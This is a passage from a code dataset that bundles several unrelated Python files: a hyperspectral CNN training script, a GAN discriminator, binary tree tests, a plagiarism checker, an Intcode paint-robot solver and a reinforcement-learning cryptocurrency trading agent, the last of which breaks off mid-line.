Data.astype(float)\r\nif opt.isnorm == 1:\r\n for band in range(Band):\r\n Data[:, :, band] = (Data[:, :, band] - np.min(Data[:, :, band])) / (\r\n np.max(Data[:, :, band]) - np.min(Data[:, :, band]))\r\nData_Padding = np.zeros((Height+int(patch_size-1),Width+int(patch_size-1),Band))\r\nfor band in range(Band):\r\n Data_Padding[:,:,band] = pad(Data[:,:,band],int((patch_size-1)/2),'symmetric')\r\ndef Patch(height_index,width_index):\r\n \"\"\" function to extract patches from the orignal data \"\"\"\r\n # transpose_array = np.transpose(Data_Padding,(2,0,1))\r\n height_slice = slice(height_index, height_index + patch_size)\r\n width_slice = slice(width_index, width_index + patch_size)\r\n patch = Data_Padding[height_slice, width_slice,:]\r\n return np.array(patch)\r\nAll_Patches, All_Labels ,Al_Labels = [],[],[]\r\ncount=0\r\nk=0\r\nres=0\r\n# for i in range(int(Height*Width/batch_size)):\r\n# All_Patches.append([])\r\n# All_Labels.append([])\r\n# Al_Labels.append([])\r\nfor j in range(0,Width):\r\n for i in range(0,Height):\r\n curr_patch=Patch(i,j)\r\n All_Patches.append(curr_patch)\r\n # Label[i,j]=np.array(Label[i,j])\r\n # Labels = convertToOneHot(Label[i,j], num_classes=Num_Classes)\r\n All_Labels.append(Label[i, j])\r\n count = count + 1\r\n # if count % batch_size == 0:\r\n # k = k + 1\r\n # if Label[i,j]!=0:\r\n# for j in range(0,Width):\r\n# for i in range(0,Height):\r\n# curr_patch=Patch(i,j)\r\n# if Label[i,j]!=0:\r\n# All_Patches.append(curr_patch)\r\n# # Label[i,j]=np.array(Label[i,j])\r\n# # Labels = convertToOneHot(Label[i,j], num_classes=Num_Classes)\r\n# All_Labels.append(Label[i, j]-1)\r\n# count = count + 1\r\nAll_Labels=np.array(All_Labels)\r\nAll_Patches=np.array(All_Patches)\r\nprint(\"the count is %d\"%count)\r\nprint(\"k is %d\"%k)\r\nprint(All_Patches.shape)\r\nHeight1, Width1, Band1 = All_Patches.shape[1], All_Patches.shape[2], All_Patches.shape[3]\r\nprint(curr_patch.shape)\r\n# for i in range(int(Height*Width/batch_size)):\r\n# All_Labels[i] = np.array(All_Labels[i])\r\nAll_Labels = convertToOneHot(All_Labels, num_classes=Num_Classes)\r\nAll_Labels=np.array(All_Labels)\r\n#4105*5*17\r\nprint(\"the shape of All_patchs\")\r\nprint(All_Patches.shape)\r\nprint(\"the shape of All_Labels\")\r\nprint(All_Labels.shape)\r\nTrain_Patch,Train_Label,Test_Patch, Test_Label = [],[],[],[]\r\nTrain_portition=opt.train_size\r\nNum=count\r\nNum_Train_Classes=int(Train_portition*Num)\r\nprint(\"Num is %d\"%Num)\r\nprint(\"Num_Train is %d\"%Num_Train_Classes)\r\nTest_portition=1-Train_portition\r\nnp.random.seed(0)\r\nidx = np.random.choice(Num, Num_Train_Classes, replace=False)\r\nidx_test = np.setdiff1d(range(Num),idx)#求集合的差\r\nTrain_Patch = [All_Patches[i] for i in idx]\r\nTrain_Label = [All_Labels[i] for i in idx]\r\nTest_Patch = [All_Patches[i] for i in idx_test]\r\nTest_Label = [All_Labels[i] for i in idx_test]\r\nTrain_Label=np.array(Train_Label)\r\nTrain_Patch=np.array(Train_Patch)\r\nTest_Label=np.array(Test_Label)\r\nTest_Patch=np.array(Test_Patch)\r\nprint(\"the shape of test_label\")\r\nprint(Test_Label.shape)\r\nprint(\"the shape of test_patch\")\r\nprint(Test_Patch.shape)\r\nTest_Label=np.reshape(Test_Label,(-1,Num_Classes))\r\nTest_Patch=np.reshape(Test_Patch,(-1,Height1,Width1,Band1))\r\nx=tf.placeholder(tf.float32, [None,Height1,Width1,Band1])\r\ny=tf.placeholder(tf.float32, [None,Num_Classes])\r\n# print(\"%d %d %d\"%(Height,Width,Band))\r\ndef weight_variable(shape):\r\n initial=tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial)\r\ndef bias_variable(shape):\r\n initial =tf.constant(0.1, shape=shape)\r\n return tf.Variable(initial)\r\ndef con2d(x,W):\r\n return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding=\"SAME\")\r\n # return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding=\"VALID\")\r\ndef max_pool(x):\r\n return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')\r\nsize=3\r\nW_conv1=weight_variable([3,3,Band1,32])\r\ntf.add_to_collection(tf.GraphKeys.WEIGHTS,W_conv1)\r\nb_conv1=bias_variable([32])\r\nh_conv1=tf.nn.relu(con2d(x,W_conv1)+b_conv1)\r\n# h_conv1=tf.nn.relu(tf.layers.BatchNormalization(trainable=True)(con2d(x,W_conv1)+b_conv1))\r\nh_conv1=max_pool(h_conv1)\r\nW_conv2=weight_variable([3,3,32,64])\r\ntf.add_to_collection(tf.GraphKeys.WEIGHTS,W_conv2)\r\nb_conv2=bias_variable([64])\r\nh_conv2=tf.nn.relu(con2d(h_conv1,W_conv2)+b_conv2)\r\n# h_conv2=tf.nn.relu(tf.layers.BatchNormalization(trainable=True)(con2d(h_conv1,W_conv2)+b_conv2))\r\nh_conv2=max_pool(h_conv2)\r\nW_fc1=weight_variable([size*size*64,128])\r\nb_fc1=bias_variable([128])\r\nh_flat=tf.reshape(h_conv2,[-1,size*size*64])\r\nh_fc1=tf.nn.relu(tf.matmul(h_flat,W_fc1)+b_fc1)\r\nW_fc2=weight_variable([128,Num_Classes])\r\n\r\nb_fc2=bias_variable([Num_Classes])\r\nh_fc2=tf.nn.relu(tf.matmul(h_fc1,W_fc2)+b_fc2)\r\nscale=0.1\r\nregularizer=tf.contrib.layers.l2_regularizer(scale)\r\nreg_term=tf.contrib.layers.apply_regularization(regularizer)\r\ncross_entropy=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=h_fc2))+reg_term\r\n# cross_entropy=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=h_fc2))\r\noptimizer=tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\r\ncorrect_prediction=tf.equal(tf.argmax(y,1),tf.argmax(h_fc2,1))\r\naccuracy=tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\r\n# Initializing the variables\r\ninit = tf.global_variables_initializer()\r\n# sess=tf.InteractiveSession()\r\n# sess.run(tf.global_variables_initializer())\r\ncount=0\r\nprint(\"the shape of train_label\")\r\nprint(Train_Label.shape)\r\nprint(\"the shape of train_patch\")\r\nprint(Train_Patch.shape)\r\nTest_Label=np.reshape(Test_Label,(-1,Num_Classes))\r\nTest_Patch=np.reshape(Test_Patch,(-1,Height1,Width1,Band1))\r\nTrain_Label=np.reshape(Train_Label,(-1,Num_Classes))\r\nTrain_Patch=np.reshape(Train_Patch,(-1,Height1,Width1,Band1))\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n # Training cycle\r\n for iteration in range(training_iters):\r\n idx = np.random.choice(Num_Train_Classes, size=batch_size, replace=False)\r\n # Use the random index to select random images and labels.\r\n # indian_pines\r\n batch_x = Train_Patch\r\n batch_y = Train_Label\r\n # pavia\r\n # batch_x = Train_Patch[idx, :]\r\n # batch_y = Train_Label[idx, :]\r\n # Run optimization op (backprop) and cost op (to get loss value)\r\n _, batch_cost, train_acc = sess.run([optimizer, cross_entropy, accuracy],feed_dict={x: batch_x,y: batch_y})\r\n # Display logs per epoch step\r\n if iteration % 100 == 0:\r\n print(\"Iteraion\", '%04d,' % (iteration), \\\r\n \"Batch cost=%.4f,\" % (batch_cost),\\\r\n \"Training Accuracy=%.4f\" % (train_acc),file=f)\r\n if iteration % 500 ==0:\r\n print('Training Data Eval: Training Accuracy = %.4f' % sess.run(accuracy,\\\r\n feed_dict={x: Train_Patch,y: Train_Label}),file=f)\r\n print('Test Data Eval: Test Accuracy = %.4f' % sess.run(accuracy,\\\r\n feed_dict={x: Test_Patch,y: Test_Label}),file=f)\r\n print(\"Optimization Finished!\",file=f)\r\n\r\n# for i in range(len(Train_Patch)):\r\n# train_accuracy = accuracy.eval(feed_dict={x: Train_Patch[i], y: Train_Label[i]})\r\n# count += train_accuracy * batch_size\r\n# print(\"step %d,training accuracy %g\" % (i,train_accuracy))\r\n# train_step.run(feed_dict={x: Train_Patch[i], y: Train_Label[i]})\r\n# print(count)\r\n# # # All_Patches[i] = np.reshape(All_Patches[i], (1, Height, Width, Band))\r\n# # # print(All_Patches[i].shape)\r\n# # if i %100 ==0:\r\n# print(\"test accuracy: %g\"%accuracy.eval(feed_dict={x:Test_Patch,y:Test_Label}))\r\n\r\n\r\n# print(Data.astype)\r\n# Data = Data.astype(float)\r\n# print(\"%d\"%(Num_Classes))\r\n# print(Data.shape)\r\n# print(Data[20,1,1])\r\nf.close()","sub_path":"simple-Net/simplenet41.py","file_name":"simplenet41.py","file_ext":"py","file_size_in_byte":9034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526498974","text":"import torch\nimport torch.nn as nn\n\nclass Discriminator(nn.Module):\n def __init__(self, input_size, hidden_size, output_size, f, f_relu):\n super(Discriminator, self).__init__()\n self.map1 = nn.Linear(input_size, hidden_size)\n #self.batch1 = nn.BatchNorm1d(hidden_size)\n self.map2 = nn.Linear(hidden_size, hidden_size)\n #self.batch2 = nn.BatchNorm1d(hidden_size)\n self.map3 = nn.Linear(hidden_size, output_size)\n #self.batch3 = nn.BatchNorm1d(hidden_size)\n #self.map4 = nn.Linear(hidden_size, output_size)\n # self.map4 = nn.Linear(hidden_size, hidden_size)\n # self.map5 = nn.Linear(hidden_size, output_size)\n self.f = f\n self.f_relu = f_relu\n\n def forward(self, x):\n x = self.map1(x)\n #x = self.batch1(x)\n x = self.f(x)\n x = self.map2(x)\n #x = self.batch2(x)\n x = self.f(x)\n x = self.map3(x)\n #x = self.batch3(x)\n x = self.f(x)\n #x = self.map4(x)\n #x = self.f(x)\n # x = self.map5(x)\n # x = self.f(x)\n return x\n","sub_path":"Architecture/Interpolation_GAN/Discriminator.py","file_name":"Discriminator.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"572942233","text":"__author__ = 'Stephen'\n\nfrom BinaryTree import Tree\nimport unittest\n\n\nclass TreeTest(unittest.TestCase):\n def test_tree(self):\n \"\"\"Test that the tree structure is as expected: all nodes have correct parent and children.\n \"\"\"\n tree = Tree()\n root = tree.add_root(1)\n left = root.add_left(2)\n right = root.add_right(3)\n\n self.assertEqual(None, root.parent)\n self.assertEqual(root, tree.root)\n self.assertEqual(left, tree.root.left)\n self.assertEqual(right, tree.root.right)\n self.assertEqual(root, left.parent)\n self.assertEqual(root, right.parent)\n self.assertEqual(None, left.left)\n self.assertEqual(None, left.right)\n self.assertEqual(None, right.left)\n self.assertEqual(None, right.right)\n\n def breadth_first_test(self):\n \"\"\"Test that the breadth first traversal returns nodes in the correct order: left to right, top to bottom;\n processing all nodes on a level from left to right before proceeding down a level.\n E.g. 1\n 2 3\n 4 5 6 7\n \"\"\"\n tree = Tree()\n root = tree.add_root(1)\n left = root.add_left(2)\n right = root.add_right(3)\n left.add_left(4)\n left.add_right(5)\n right.add_left(6)\n right.add_right(7)\n\n items = []\n for item in tree.breadth_first():\n items.append(item.data)\n\n self.assertEqual(items, [1, 2, 3, 4, 5, 6, 7])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Assignment2/Breadth-FirstTreeTraversal/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"582747129","text":"from parsers.text_parsers import PdfParser, SimpleParser\nfrom parsers.ngram import NGrammer\nfrom web.webpage import Webpage\nfrom web.references import Google\n\nclass Antyplagiat(object):\n def __init__(self, path_to_document, parser_type=None, ngram_size= 3):\n self.path= path_to_document\n self.ngram_size = ngram_size\n if parser_type is None:\n parser_type = self.path.split('.')[-1]\n if parser_type == \"pdf\":\n self.parser = PdfParser(self.path)\n elif parser_type == \"txt\":\n self.parser = SimpleParser(self.path)\n else:\n raise Exception(\"Wrong parser type provided\")\n \n def generate_report(self):\n ngram_obj = NGrammer(self.parser.get_text_alpha(), n= self.ngram_size)\n ngrams = ngram_obj.get_suspicious_ngrams()\n print(f\"{len(ngrams)} suspicious {self.ngram_size}-grams have been found\")\n ngram_meta = {}\n for ngram in ngrams:\n #ngram_meta[ngram] = []\n g = Google(ngram)\n websites = g.find_susp_doc()\n if websites:\n ngram_meta[ngram] = websites\n \n ngrams_found_per = (len(ngram_meta.keys())/ len(ngram_obj.all_ngrams)) * 100\n\n print(f\"\\n\\n\\nValidation of file {self.parser.get_file_name()}\\n\")\n print(f\"{len(ngram_meta.keys())} {self.ngram_size}-grams found in outside sources\")\n print(f\"This consists {ngrams_found_per}% of all suspicious {self.ngram_size}-grams found\")\n print(f\"\\n Found n-grams:\")\n for ngram, urls in ngram_meta.items():\n print(f\"{ngram} was found in : \")\n for url in urls:\n print(f\"{url[0]} - {url[1]}\")\n\nif __name__ == \"__main__\":\n a = Antyplagiat(r\"test/krzyzacy.txt\", parser_type=\"txt\", ngram_size=5)\n a.generate_report()","sub_path":"antyplagiat/antyplagiat.py","file_name":"antyplagiat.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209991630","text":"from program import Program\n\n\nDEBUG = False\n\n\nclass Direction:\n\n def __init__(self):\n self.index = 0\n self.directions = [\n (0, 1),\n (1, 0),\n (0, -1),\n (-1, 0)\n ]\n\n def rotate(self, value):\n self.index += (value if value == 1 else -1)\n\n def step(self, position):\n to_go = self.directions[self.index % len(self.directions)]\n return position[0] + to_go[0], position[1] + to_go[1]\n\n\nclass PaintBot:\n\n def __init__(self, memory, starting_color):\n self.program = Program(get_memory(), self, DEBUG)\n self.color = True\n \n self.direction = Direction()\n self.grid = {}\n self.position = (0, 0)\n self.grid[self.position] = starting_color\n\n def run(self):\n while self.program.has_next():\n self.program.next()\n\n def get_input(self):\n return self.grid[self.position] if self.position in self.grid else 0\n\n def add_output(self, value):\n if self.color:\n self.grid[self.position] = value\n else:\n self.direction.rotate(value)\n self.position = self.direction.step(self.position)\n self.color = not self.color\n\n def get_grid(self):\n xs = [position[0] for position in self.grid]\n ys = [position[1] for position in self.grid]\n\n rows = []\n for y in range(min(ys), max(ys)+1):\n row = []\n for x in range(max(xs), min(xs) - 1, -1):\n value = self.grid.get((x, y), 0)\n value = '.' if value == 0 else '#'\n row.append(value)\n rows.append(''.join(row))\n return '\\n'.join(rows)\n\n\ndef main():\n # Part 1: 1909\n print('Part 1: {}'.format(run(0, False)))\n # Part 2: JUFEKHPH\n run(1, True)\n\n\ndef run(setting, print_grid):\n bot = PaintBot(get_memory(), setting)\n bot.run()\n if print_grid:\n print(bot.get_grid())\n return len(bot.grid)\n\n\ndef get_memory():\n file_name = 'data'\n with open('{}.txt'.format(file_name), 'r') as f:\n return [int(datum) for datum in f.read().split(',')]\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2019/11/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"294006236","text":"#!/usr/bin/env python2.7\nimport os\nimport sys \nimport re\nimport glob\nimport csv\nfrom pandas import DataFrame\nimport pandas as pd\nimport numpy as np\nimport webbrowser\nimport pandas\n\n\n\ndef main(argv):\n if len(argv) >= 2:\n print (\"\\nUsage: python2.7 final_report.py \")\n sys.exit(2)\n\nkraken = sys.argv[1]\nstatH = sys.argv[2]+ \"bammappingStats.txt\"\nstatE = sys.argv[3]+ \"bammappingStats.txt\"\nstatC = sys.argv[4]+ \"bammappingStats.txt\"\nkrona = sys.argv[5]\noutputfileconcat = sys.argv[6]\n\n\n\nstringToMatch = ['hepatitis', 'Ebola' , 'Chikungunya' ]\ndf = []\nfor key in stringToMatch :\n\t#print (key)\n\tkrakenfile = open (kraken , \"r\")\t\n\ttrouv = key,\"Not Found\"\n\tfor line in krakenfile :\t\n\t\tif key in line: \n\t\t\ttrouv = key,\"Found\"\n\t#print (trouv)\n\n\tdf.append(trouv)\n#print(df)\nff = DataFrame.from_records(df) \n#print (ff)\n#bwa output\nimport glob\n\nbwa = glob.glob(\"*bammappingStats.txt\")\n#print (bwa)\nsearch = ['mapped (']\ndf2 = []\nfor file in bwa :\n with open(file, 'r') as f:\n ligne = f.readlines()\n #print (ligne)\n for line in ligne:\n if \"mapped (\" in line :\n match = (re.sub('\\.bammappingStats.txt$', '', file),line)\n #print (match)\n df2.append(match)\n #print(df2)\ngg = DataFrame.from_records(df2)\nresult = pd.concat([gg, ff], axis=1, ignore_index=True)\nresult = result.drop([2], axis = 1)\nresult.columns = ['Pathogen', '%mapped' , 'kraken']\n#print(result)\n\nresult.to_html(\"Table.html\")\n\n#convert kraken tsv to html :#https://github.com/dbohdan/csv2html?fbclid=IwAR0L3a41xXXVpWXxH-q-httRuB1x-6S6KXQysBAx5dGhBaE3Ntg6WkVs7yc\ntable = \"\"\nnargs = len(sys.argv)\nwith open(kraken, 'rb') as tsvfile :\n\tcsv_table=pd.read_table(tsvfile , sep='\\t')\n\tcsv_table.columns =['Percentage of reads covered by the clade rooted at this taxon' ,'Number of reads covered by the clade rooted at this taxon','Number of reads assigned directly to this taxon','Rank code','NCBI taxonomy ID','scientific name']\t\n #convert tsv to csv first\n\t\n\tcsv_table.to_csv('kraken.csv.tmp' )\t\n\t#print (csv_table)\n\ttable = \"\"\n\twith open('kraken.csv.tmp', 'rb') as csvfile:\n\t\t\n\t\treader = csv.reader(csvfile , delimiter=',')\n\t\t#print (reader)\n\n\t\ttable += \"\\n\"\n\t\tfor row in reader:\n\t\t\ttable += \"\\n\" + \"\".join([\"\\n\" % \n\t\t\t\t item for item in row]) + \"\\n\"\n\t\ttable += \"
%s
\\n\"\n\n\t# convert csv to html\n\tif nargs > 2:\n\t\twith open(sys.argv[6], 'w') as htmlfile:\n\t\t\thtmlfile.write(table)\n\t\t\t#print type (htmlfile)\n\t\t\n\telse:\n\t\toutput_file.write(table)\n# print (table)\n\n#URL = \"input file name is \" % kraken\n#print (URL)\n#message = \"\"\n#new_message = message.format(URL=\"Kraken\")\n\n######################\"report\n#f = open ('final_report.html', \"w\")\n\n\nwith open(outputfileconcat , \"w\") as f :\n\tmessage1 = \"\"\"\n \n \n
\n

General report

\n\t

Outputfile name : \"\"\"\n\t\n\tmessage2 = outputfileconcat\n\t\n\tmessage3 = \"\"\"

\n
\n \n \n Input file name \n\t\n \n

\n

\n

Interactive vizualisation of taxa relative abundance by Krona

\n

Krona result are displayed here :

krona \n\t\t\n

\n \n \n \n

Best Hits

\n
\n \n
\n
\n
\n
\n \n
\n

kraken_report

\n \n
\n
\n
\n
\n \n \"\"\"\n\tf.write(message1 + message2+ message3)\n\tf.close()\n\nfilenname = outputfileconcat\n\nwebbrowser.open_new_tab(filenname)\n\n\n","sub_path":"viraldetect/helpers/final_report.py","file_name":"final_report.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"570100461","text":"'''\nMint Agent, ycli\n[Requires utils_v2.py]\nBased on Vanilla DQ Agent. Changes include:\n1. Change neural network to 2 layers to overcome vanishing gradients. Also changed stddev in initialization.\n2. Require 'cash_supply' for __init__()\n3. Include 'seq_len' as an argument for __init__(). 'seq_len' is the number of hours the agent sees before making a decision. Defaults to 10.\n4. Change self.batch_size from 32 to 1800.\n5. Include 'USDT_BTC_open_label', 'USDT_BTC_pctChange_label', 'USDT_BTC_volatility_label' as state features. See utils_v2.py.\n6. Change self.env.getStates() to self.env.getStatesSequence(), which is a new method implemented in utils_v2.py\n7. Implement self.state_mean in __replay() for feature centering. Not sure if this is necessary. [problem: this is not saved with the model, so when you load the model later you lose this state_mean.]\n8. In __replay(), roll the reward column of self.memory for 9 hours. Note that this does not need to match seq_len.\n9. In train(), change reward definition to the percent change of portfolio value. This, with the rolling mentioned above, makes the reward the relative change in portfolio value of the 10th hour in the future with respect to the 9th hour in the future. (This is still not a natural reward function, right?)\n10. In test(), the model is not automatically loaded. Instead, load the model explicitly in your ipynb.\n11. In train() and test(), change the order of env.step() and portfolio.apply_action(). Step first.\n12. Changed keras implementation to tensorflow.\n13. Changed activation to leaky_relu !!!!!\n'''\n\nfrom importlib import reload\nimport utils_v2\nreload(utils_v2)\nfrom utils_v2 import *\n\nimport tensorflow as tf\n\n# from keras.models import Sequential\n# from keras.layers import Dense\n# from keras.optimizers import Adam\n# from keras import backend as K\n# from keras import initializers\n# from keras.models import load_model\n\n# Neural Network for the Q value approximation\nclass QValue_NN:\n def __init__(self, state_size, action_size, units):\n self._state_size = state_size\n self._action_size = action_size\n self._units = units\n self.__build_model()\n \n def __huber_loss(self, target, prediction):\n # sqrt(1+error^2)-1\n error = prediction - target\n return K.mean(K.sqrt(1+K.square(error))-1, axis=-1)\n\n def __build_model(self): # maybe fix random seed here\n \n self.X = tf.placeholder(tf.float32, [None, self._state_size])\n self.y = tf.placeholder(tf.float32, [None, self._action_size])\n a1 = tf.layers.dense(self.X, self._action_size, activation=tf.nn.leaky_relu) # first FC\n self.preds = tf.layers.dense(a1, self._action_size, activation=tf.nn.leaky_relu) # second FC\n self.loss = tf.nn.l2_loss(self.preds - self.y)\n optimizer = tf.train.AdamOptimizer(learning_rate=0.01) \n self.train_op = optimizer.minimize(self.loss)\n\n def train(self, session, state, qvalues):\n state_reshape = np.reshape(state, [1, len(state)])\n session.run(self.train_op, feed_dict={self.X: state_reshape, self.y:qvalues})\n\n def predict(self, session, state):\n state_reshape = np.reshape(state, [1, len(state)])\n return session.run(self.preds, feed_dict={self.X: state_reshape})\n \n# def set_weights(self, model_weights):\n# self._model.set_weights(model_weights)\n \n# def get_weights(self):\n# return self._model.get_weights()\n \n# def save(self, path):\n# self._model.save_weights(path)\n \n# def load(self, path):\n# self._model.load_weights(path)\n \n\nimport random\nimport numpy as np\nfrom collections import deque\nimport pandas as pd\n\n# Agent Implementation\nclass MintDQNAgent:\n \n # initialize internal variables\n def __init__(self, cash_supply, input_seq_len=10, gamma=0.95, num_neutron=24, epsilon_min = 0.001, epsilon_decay=0.995, \n coin_name='BTC', num_coins_per_order=1.0, recent_k = 0,\n external_states = external_state_list,\n internal_states = internal_state_list, verbose=False):\n self.max_mem_len = 2000\n self.memory = deque(maxlen=2000)\n self.batch_size = 1800\n self.gamma = gamma\n self.epsilon=1.0\n self.epsilon_min=epsilon_min \n self.epsilon_decay=epsilon_decay\n self.coin_name = coin_name\n # External states\n self.external_states = external_states\n self.env = Environment(coin_name=coin_name, states=external_states, recent_k=recent_k)\n # Internal states\n self.internal_states = internal_states\n self.portfolio = Portfolio(cash_supply=cash_supply, num_coins_per_order=num_coins_per_order, states=internal_states,\n verbose=verbose, final_price=self.env.getFinalPrice())\n # NN model\n _state_size = self.env.getStateSpaceSize()*input_seq_len + self.portfolio.getStateSpaceSize()\n tf.reset_default_graph()\n with tf.variable_scope(\"model\", initializer=tf.contrib.layers.xavier_initializer()) as scope:\n self.model = QValue_NN(_state_size, self.portfolio.getActionSpaceSize(), num_neutron)\n self.old_vars = {v.name.split('model/')[-1] : v for v in tf.trainable_variables() if v.name.startswith(scope.name + \"/\")}\n with tf.variable_scope(\"target_model\", initializer=tf.contrib.layers.xavier_initializer()):\n self.target_model = QValue_NN(_state_size, self.portfolio.getActionSpaceSize(), num_neutron)\n \n self.train_cum_returns = []\n \n self.test_cum_returns = []\n self.test_portfolio_values = []\n self.test_actions = []\n self.seq_len = input_seq_len\n \n self.state_mean = None\n \n def plot_external_states(self):\n self.env.plot(self.external_states)\n \n \n def __act(self, session, state):\n if np.random.rand() < self.epsilon:\n return random.choice(list(Action))\n act_values = self.model.predict(session, state)\n print(act_values)\n# if np.array_equal(act_values, np.array([[-1.0, -1.0, -1.0]])):\n# print(\"what???????????????????????????????????????\")\n# print(state)\n return Action(np.argmax(act_values[0]))\n \n def __remember(self, state, action, reward, next_state, isDone):\n self.memory.append((state, action, reward, next_state, isDone))\n \n def __update_target_model(self, sess):\n # self.target_model._model.set_weights(self.model._model.get_weights())\n with tf.variable_scope(\"target_model\", initializer=tf.contrib.layers.xavier_initializer()) as scope:\n# for v in tf.trainable_variables():\n# print(v.name)\n assignments = [v.assign(self.old_vars[v.name.split('model/')[-1]]) \\\n for v in tf.trainable_variables() if v.name.startswith(scope.name + \"/\")]\n sess.run(assignments)\n\n def print_my_memory(self):\n mem = list(self.memory)\n mem_str = []\n for s, a, r, s_, donzo in mem:\n mem_str += [\"%s_%s_%s_%s_%s\" % (str(s), str(a), str(r), str(s_), str(donzo))]\n \n uniques = list(set(mem_str))\n uniques.sort() \n \n for elem in uniques:\n print(elem)\n print(mem_str.count(elem))\n print(\"\\n\")\n \n def __replay(self, session, batch_size):\n # key: some delay here\n \n# print(self.memory[:,0])\n# print('mean state:', np.mean(self.memory[:,0]))\n \n self.memory = np.array(self.memory)\n self.memory[:,2] = np.roll(self.memory[:,2], -9, axis=0)\n self.memory = deque(self.memory[:-9,:], maxlen=self.max_mem_len)\n print(len(self.memory))\n minibatch = random.sample(self.memory, self.batch_size)\n \n for state, action, reward, next_state, isDone in minibatch:\n# state -= self.state_mean\n# next_state -= self.state_mean\n# print('state',state)\n target = self.model.predict(session, state)\n# print('target predict before action:', target)\n if isDone:\n target[0][action.value] = reward\n else:\n a = self.model.predict(session, next_state)[0]\n t = self.target_model.predict(session, next_state)[0]\n \n # Bellman Equation\n target[0][action.value] = reward + self.gamma * t[np.argmax(a)]\n# print('action:',action)\n# print('target predict after action:', target)\n# print('======')\n\n self.model.train(session, state, target)\n \n # update the epsilon to gradually reduce the random exploration\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n # Agent Training\n \n ### Sample Usage:\n \n ### import datetime\n ### end = datetime.datetime(2018,1,1,0)\n ### agent.train(end_time = end)\n \n def train(self, session, end_time, num_episodes=100, start_time=None, verbose=True):\n session.run(tf.global_variables_initializer())\n self.cum_returns = []\n \n if start_time is None:\n start_time = self.env.start_index\n \n n_days = (end_time - start_time) // (self.env.time_delta * 24)\n print('Training from ', start_time, ' to', end_time, ': ', '~', n_days, 'days\\n')\n \n for i in range(num_episodes):\n \n self.env.reset()\n self.portfolio.reset()\n self.env.set_current_time(start_time)\n state = self.env.getStatesSequence() + self.portfolio.getStates()\n\n # walk through the environment\n # obtain action based on state values using the Neural Network model\n # collect reward\n # update the experience in Memory\n while (True):\n if verbose:\n print('Current time:', self.env.current_index)\n \n value_before_action = self.portfolio.getCurrentValue(self.env.getCurrentPrice())\n \n if self.state_mean is not None:\n action = self.__act(session, state - self.state_mean)\n else:\n action = self.__act(session, state)\n isDone, next_state = self.env.step(end_time) # order changed\n action = self.portfolio.apply_action(self.env.getCurrentPrice(), action, verbose)\n \n next_state = self.env.getStatesSequence() # mint\n next_state = next_state + self.portfolio.getStates()\n \n if self.state_mean is not None:\n next_state -= self.state_mean\n \n# reward = self.env.getReward(action) # this was used in vanilla\n reward = (self.portfolio.getCurrentValue(self.env.getCurrentPrice()) / value_before_action - 1) * 100\n if verbose:\n print(action, reward)\n print()\n \n self.__remember(state, action, reward, next_state, isDone)\n state = next_state\n \n if i == 0:\n # estimate state mean\n memory = np.array(self.memory)\n state_sum = 0\n for list_of_state in memory[:,0]:\n state_sum += np.array(list_of_state)\n self.state_mean = state_sum / len(memory)\n \n if isDone:\n self.__update_target_model(session)\n \n cum_return = self.portfolio.getReturnsPercent(self.env.getCurrentPrice())\n self.train_cum_returns.append(cum_return)\n \n print(\"episode: {}/{}, returns: {:.2}, epsilon: {:.2}\"\n .format(i+1, num_episodes, \n cum_return, \n self.epsilon))\n break\n \n # train the Neural Network incrementally with the new experiences\n if len(self.memory) > self.batch_size:\n self.__replay(session, self.batch_size)\n \n self.target_model.save('{}.model.h5'.format(self.coin_name))\n \n \n ### Sample Usage:\n \n ### import datetime\n ### start = datetime.datetime(2018,1,1,0)\n ### agent.test(start_time = start)\n \n def test(self, session, start_time, end_time=None, epsilon=None, verbose=True, print_freq='daily'):\n if epsilon is not None:\n self.epsilon = epsilon\n else:\n self.epsilon = 0 # set to 0, no randomness allowed \n \n self.env.reset()\n self.env.set_current_time(start_time)\n self.portfolio.reset()\n state = self.env.getStatesSequence() + self.portfolio.getStates()\n state -= self.state_mean\n# self.model.load('{}.model.h5'.format(self.coin_name))\n \n self.test_cum_returns = []\n self.test_portfolio_values = []\n self.test_actions = []\n \n if end_time is None or end_time >= self.env.end_index:\n end_time = self.env.end_index - self.env.time_delta\n \n n_days = (end_time - start_time) // (self.env.time_delta * 24)\n print('Testing from ', start_time, ' to', end_time, ': ', '~', n_days, 'days\\n')\n \n start_day = start_time.day\n verbose_g = verbose\n \n while (True):\n \n if verbose:\n if print_freq == 'hourly':\n print('Current time:', self.env.current_index)\n verbose = True\n if print_freq == 'daily':\n if self.env.current_index.hour == 0:\n print('Current time:', self.env.current_index)\n verbose = True\n else:\n verbose = False\n elif print_freq == 'weekly': \n if self.env.current_index.day in np.roll((np.arange(28)+1), 28-start_day+1)[::7] and self.env.current_index.hour == 0:\n print('Current time:', self.env.current_index)\n verbose = True\n else:\n verbose = False\n \n action = self.__act(session, state)\n isDone, next_state = self.env.step(end_time) # order changed\n action = self.portfolio.apply_action(self.env.getCurrentPrice(), action, verbose)\n \n next_state = self.env.getStatesSequence()\n next_state = next_state + self.portfolio.getStates()\n state = next_state\n state -= self.state_mean\n \n cum_return = 